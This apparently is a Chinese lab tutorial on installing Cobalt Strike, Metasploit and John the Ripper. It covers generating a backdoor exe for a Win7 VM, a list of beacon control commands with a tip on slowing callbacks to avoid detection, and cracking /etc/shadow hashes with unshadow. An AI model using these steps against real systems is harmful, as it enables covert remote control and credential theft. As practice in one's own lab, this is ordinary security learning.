ubuntu安装CobaltStrike，MSF，john

ubuntu安装CobaltStrike
ubuntu做服务端，windows10本机做客户端，win7做运行木\haha马的机子

sudo ./teamserver ubuntuIP 自定义连接密码

win10，点击cs.bat

弹出cmd对话框

静待会出现cs的连接框
host：ubuntuIP
port：默认
user：名字随便起
password：刚自定义的连接密码

连接成功
注意：
3. 50050端口
4. ubuntu和win10要ping通（nat模式）

使用

1. 设置监听
   名字：生成后门时候可作为区别标志
   host：ubuntIP
   port：随便找个不常用的
   
2. 攻击—生成后门—windows exe
   选择刚才设置的监听
   因为我要把这个exe放在win7上执行，win7是64位的
   
   win7运行刚生成的exe
   
   win10这里提示上线
   
   参考 博文

常用基础命令

help →查看beacon shell所有内置命令帮助,如果想查看指定命令的用法,可以这样help upload

note →给当前目录机器起个名字, note beacon-shell

cd →在目标系统中切换目录,注意在win系统中切换目录要用双反斜杠,或者直接用’/’ cd c:

mkdir →新建目录, mkdir d:beacon

rm →删除文件或目录, rm d:beacon

upload →上传文件到目标系统中

download →从目标系统下载指定文件, download C:Userswin7cnDesktopputty.exe

cancel →取消下载任务,比如,一个文件如果特别大,下载可能会非常耗时,假如中途你不想继续下了,就可以用这个取消一下

shell →在目标系统中执行指定的cmd命令, shell whoami

getuid → 查看当前beacon 会话在目标系统中的用户权限,可能需要bypassuac或者提权

pwd →查看当前在目录系统中的路径

ls →列出当前目录下的所有文件和目录

drives →列表出目标系统的所有分区[win中叫盘符]

ps →查看目标系统当前的所有的进程列表

kill →杀掉指定进程, kill 4653

sleep 10 →指定被控端休眠时间,默认60秒一次回传,让被控端每10秒来下载一次任务,实际中频率不宜过快,容易被发现,80左右一次即可

jobs →列出所有的任务列表,有些任务执行时间可能稍微较长,此时就可以从任务列表中看到其所对应的具体任务id,针对性的清除

jobkill →如果发现任务不知是何原因长时间没有执行或者异常,可尝试用此命令直接结束该任务, jobkill 1345

clear →清除beacon内部的任务队列

checkin →强制让被控端回连一次

exit →终止当前beacon 会话

ctrl + k →清屏

在控制台所有操作指令都会被记录保留在Cobalt Strike目录logs下

ubuntu安装msf

参考 博文
博文
下载

放到/opt下

sudo dpkg -i metasploit-framework_6.1.2+20210824102555~1rapid7-1_amd64.deb
sudo apt install postgresql
sudo service postgresql status

输入msfconsole，进行配置

john破解linux的shadow密码

使用参考
2
shadow内容详解
安装John the Ripper
下载：wget http://www.openwall.com/john/j/john-1.8.0.tar.gz
解压：tar -xvf john-1.8.0.tar.gz
进入john-1.8.0/src目录：cd john-1.8.0/src

make clean linux-x86-64
src是源文件目录，run是运行目录
cd /run

把获取的shadow文件，放在run目录下，进入run目录下，直接破解shadow文件： ./john --show shadow
破解出账号root123的秘密是root

对新linux系统密文放在/etc/passwd和/etc/shadow两个文件下，可以用unshadow /etc/passwd /etc/shadow >mypasswd命令将两个文件进行合并，然后破解mypasswd